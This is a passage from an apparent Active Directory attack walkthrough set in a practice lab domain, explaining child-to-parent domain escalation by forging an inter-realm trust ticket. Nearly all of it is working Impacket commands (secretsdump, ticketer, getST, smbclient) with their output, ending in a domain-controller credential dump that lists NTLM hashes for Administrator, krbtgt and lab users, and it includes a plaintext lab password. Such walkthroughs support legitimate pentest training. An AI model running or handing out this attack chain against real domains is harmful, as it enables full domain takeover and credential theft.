Trust ticket - forge inter-realm TGT

  • Another way to escalate from child to parent is by extracting the trust key and use it to create our trust ticket (a very good explanation and examples with Mimikatz can be found here : https://adsecurity.org/?p=1588)

  • The trust key can be found by targeting the netbios name of the domain on the ntds

secretsdump.py -just-dc-user 'NEWYORK$' \
 north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.11
 
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
newyork$:1105:aad3b435b51404eeaad3b435b51404ee:59f1453dcd3f2fdc8c52f38693806154:::
[*] Kerberos keys grabbed
newyork$:aes256-cts-hmac-sha1-96:8d20b70ca945f979ff4ac5928e6f7397b43a3737ac9b1ee2579294c584bbe49e
newyork$:aes128-cts-hmac-sha1-96:05c2cc6747982c155cc82ccae92b8475
newyork$:des-cbc-md5:6e647ff89b08b089
[*] Cleaning up...

  • Now we got the trust key we can forge the ticket just like we done with the krbtgt user hash but this time we will set the spn : krbtgt/parent_domain

ticketer.py -nthash 59f1453dcd3f2fdc8c52f38693806154 \ #newyork$ hash
 -domain-sid S-1-5-21-3634065772-4036021599-3644360361 \ #north.newyork.local SID
 -domain north.newyork.local \
 -extra-sid S-1-5-21-620482180-1620433373-1814187987-519 \ #newyork.local SID + Extra-SID
 -spn krbtgt/newyork.local trustfakeuser

  • Now we will use the forged TGT to ask a ST on the parent domain

export KRB5CCNAME=/home/jefe/delegation/trustfakeuser.ccache

getST.py -k -no-pass -spn cifs/nyc.newyork.local \
 newyork.local/trustfakeuser@newyork.local -debug

  • And now we can use our service ticket :)

  • connect with smbclient

export KRB5CCNAME=/workspace/trusts/trustfakeuser@newyork.local@cifs_nyc.newyork.local@NEWYORK.LOCAL.ccache
smbclient.py -k -no-pass trustfakeuser@nyc.newyork.local

  • or even dump secrets

secretsdump.py -k -no-pass -just-dc-ntlm trustfakeuser@nyc.newyork.local
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9bd3def911c72eaa484fc6a302f3a08b:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
Donald.Trump:1113:aad3b435b51404eeaad3b435b51404ee:5c4af7d7a0e3091678e947c3ed151b81:::
hugo.Chavez:1114:aad3b435b51404eeaad3b435b51404ee:12e3795b7dedb3bb741f2e2869616080:::
mateo.Pacheco:1115:aad3b435b51404eeaad3b435b51404ee:1ff4aa72d776c5834ba4893ab192f016:::
nicolas.Maduro:1116:aad3b435b51404eeaad3b435b51404ee:b3b3717f7d51b37fb325f7e7d048e998:::
marco.Lopez:1117:aad3b435b51404eeaad3b435b51404ee:9029cf007326107eb1c519c84ea60dbe:::
ramon.Maldonado:1118:aad3b435b51404eeaad3b435b51404ee:f2477a144dff4f216ab81f2ac3e3207d:::
rafael.Smith:1119:aad3b435b51404eeaad3b435b51404ee:1e9ed4fc99088768eed631acfcd49bce:::
diego.Montenegro:1120:aad3b435b51404eeaad3b435b51404ee:af41d274ce3ba74423fbe596cf944710:::
lorenzo.Cruz:1121:aad3b435b51404eeaad3b435b51404ee:6c439acfa121a821552568b086c8d210:::
jesus.Puello:1122:aad3b435b51404eeaad3b435b51404ee:2c1854ada028754e5d16113cab23fe5d:::
martin.Osuna:1123:aad3b435b51404eeaad3b435b51404ee:02166150bda700bc7be38198179b20fc:::
NYC$:1001:aad3b435b51404eeaad3b435b51404ee:0a38be3c64921d206de05e782d09edb0:::
NORTH$:1104:aad3b435b51404eeaad3b435b51404ee:59f1453dcd3f2fdc8c52f38693806154:::
maryland$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
PreviousGolden ticket + ExtraSidNextForest Trust (newyork.local -> maryland.local)

Last updated